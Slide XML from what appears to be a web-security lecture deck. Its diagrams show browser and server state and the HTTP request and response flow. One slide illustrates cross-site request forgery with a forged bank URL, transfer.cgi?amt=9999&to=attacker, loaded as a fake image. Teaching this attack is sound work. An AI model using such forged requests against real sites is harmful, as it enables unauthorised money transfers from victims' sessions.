              <a:gd name="T0" fmla="*/ 243121 w 236220"/>
              <a:gd name="T1" fmla="*/ 0 h 236220"/>
              <a:gd name="T2" fmla="*/ 0 w 236220"/>
              <a:gd name="T3" fmla="*/ 121572 h 236220"/>
              <a:gd name="T4" fmla="*/ 243121 w 236220"/>
              <a:gd name="T5" fmla="*/ 243159 h 236220"/>
              <a:gd name="T6" fmla="*/ 243121 w 236220"/>
              <a:gd name="T7" fmla="*/ 0 h 236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220" h="236220">
                <a:moveTo>
                  <a:pt x="235737" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="117868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235737" y="235750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2357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7" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2EC02E-CA93-C143-BB89-064CA08A2CCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3873500" y="3200400"/>
            <a:ext cx="2438400" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21518" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AAACD0A-EC8B-5743-B128-29AAD9F8FB15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3944938" y="2900363"/>
            <a:ext cx="2081212" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2081529"/>
              <a:gd name="T1" fmla="*/ 2044610 w 2081529"/>
              <a:gd name="T2" fmla="*/ 2073974 w 2081529"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T3">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T4">
                <a:pos x="T1" y="0"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2081529">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2051784" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2081252"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19" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E618FE-F1F8-764B-B289-32E893789894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5995988" y="2782888"/>
            <a:ext cx="236537" cy="236537"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 236220"/>
              <a:gd name="T1" fmla="*/ 0 h 236219"/>
              <a:gd name="T2" fmla="*/ 0 w 236220"/>
              <a:gd name="T3" fmla="*/ 243145 h 236219"/>
              <a:gd name="T4" fmla="*/ 243121 w 236220"/>
              <a:gd name="T5" fmla="*/ 121572 h 236219"/>
              <a:gd name="T6" fmla="*/ 0 w 236220"/>
              <a:gd name="T7" fmla="*/ 0 h 2362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220" h="236219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="235737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235737" y="1178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0" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D293452-94FB-AB49-AA9C-9A3FA92FFD08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000500" y="2425700"/>
            <a:ext cx="2178050" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21521" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0979B06E-7A1A-7B4E-BA78-890491009D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6524625" y="3251200"/>
            <a:ext cx="763588" cy="4810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1522" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C10B9CD9-1183-A04E-8270-288A2647FC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6642100" y="2913063"/>
            <a:ext cx="12033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indent="762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2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web server  State</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21523" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE39808-99E0-3A4C-88CA-28065F2F0FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2784475" y="3251200"/>
            <a:ext cx="763588" cy="4810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4" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36B587EE-F426-8241-AB25-A9A9F3BCF518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489200" y="3035300"/>
            <a:ext cx="923925" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="418361" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>State</a:t>
            </a:r>
            <a:endParaRPr sz="17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473EC29-5AEA-6A4A-A8A0-958047CED73C}"/>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8851" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DAA7B57-7189-9241-A7FD-D8C7878E2DB3}"/>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8852" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AF32807-A9E9-DA4A-AB97-BBE5AD340B41}"/>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8853" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{225EB93C-BD51-6B48-8486-2973EAEB0520}"/>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EFC9128F-D5BD-DE43-9E2C-3A9C4B9D8C9F}"/>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9ED28864-4AD7-5E4F-9927-24D6D850BC7E}"/>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8856" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6632E7-B9E8-2F41-B80F-28E179E7E8D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7807325" y="1857375"/>
            <a:ext cx="2060575" cy="941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8857" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32061B0B-B4D4-C14A-ADF7-CE775A83DF3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2000250" cy="931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21C40875-2D5E-C74B-8E56-64C1D05D6DC3}"/>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12711ABE-D19D-C946-BAA5-EF38898C84F0}"/>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EBADA24-4F63-7341-8310-8C1C45A15DFC}"/>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413E425E-CBC9-DE44-B345-66A5501DF2D3}"/>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2BAB8CF3-BBAB-E242-9CA0-A50B29106130}"/>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78863" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A25146C-3D31-2941-9012-F8CB18B4A0E0}"/>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
        <p:nvSpPr>
          <p:cNvPr id="78864" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9216FBE-6243-A949-81DA-811A9F6C8CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5784850"/>
            <a:ext cx="37496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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser automatically  visits the URL to obtain  what it believes will be  an image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78865" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78914B90-E794-7846-8C02-A41D9CBC094D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7773988" y="4994275"/>
            <a:ext cx="2132012" cy="16954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8866" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{605C17B0-C653-B74B-B976-F52BE129DD07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="5029200"/>
            <a:ext cx="2051050" cy="16097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8867" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34A4401-CA27-D245-8041-4E8CEE0817E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="50292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8868" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B351727D-8934-DB4D-B33A-AF02BE956AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7970838" y="55768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sp>
        <p:nvSpPr>
          <p:cNvPr id="78869" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E43C3F0-8A29-3749-B19A-60C0D9C75DFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="780000">
            <a:off x="3419475" y="5384800"/>
            <a:ext cx="380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138"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>HabibB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>ank.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78870" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0994EB16-8CDA-1A4B-A53B-675AF974FA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="780000">
            <a:off x="2600325" y="5648325"/>
            <a:ext cx="4976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075"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer.cgi?amt=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B708BD5-53F7-E44D-A782-CA67C84A90F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="4648200"/>
            <a:ext cx="5251450"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07E9E5C-BAE4-6C46-AB10-1A4A6320FCFF}"/>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79875" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24767B5A-90D3-3E4A-84FD-4BAD44115ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1289050" y="2955925"/>
            <a:ext cx="1466850" cy="1577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9876" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F28B751-5255-2941-B1E9-E9D11E8A361F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="2965450"/>
            <a:ext cx="1408113" cy="1517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9877" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA0053D7-BAC3-DA4B-B75B-76CD8B3F6611}"/>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86782452-9032-1049-AD30-58BFA23C62AE}"/>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6624975B-A9A3-0249-B562-A6E158D9DBB6}"/>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79880" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327D204A-B9CB-7B45-87A6-842B738B21D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7807325" y="1857375"/>
            <a:ext cx="2060575" cy="941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79881" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CAA8D26-6144-F243-BCEE-06EAB3628884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2000250" cy="931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7E5F1F11-AA70-BA40-BA79-747B74C52370}"/>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E38151E5-4F2D-8444-862D-25C78B225C0C}"/>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AE7F20A0-4768-FA4A-9A1C-753819E4AE47}"/>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8675289F-6544-614E-AF3A-8F3ED6DACD13}"/>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450FC78D-ECC8-9447-895C-E0D7A1ACD5E4}"/>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79887" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EF10625-1F1C-CF48-9FB5-B18018AD5F56}"/>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
        <p:nvSpPr>
          <p:cNvPr id="79888" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71182CE0-06CF-104C-910D-9184FE5D8A55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5784850"/>
            <a:ext cx="37496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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser automatically  visits the URL to obtain  what it believes will be  an image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79889" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7003CA03-6E49-1A41-B9C6-7C9196DAA873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7773988" y="4994275"/>
            <a:ext cx="2132012" cy="16954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9890" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59785EF-0E3B-8E40-8BD0-B2E2A99A8813}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="5029200"/>
            <a:ext cx="2051050" cy="16097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9891" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBC68CBB-9B0D-2E4D-8B29-8346AB15D264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="50292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9892" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B15D3FD-0AFE-434C-8378-6EC821F86F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7970838" y="55768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sp>
        <p:nvSpPr>
          <p:cNvPr id="79893" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA67507-730A-8249-8B5D-3B0101CEB4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="780000">
            <a:off x="3419475" y="5384800"/>
            <a:ext cx="380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138"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
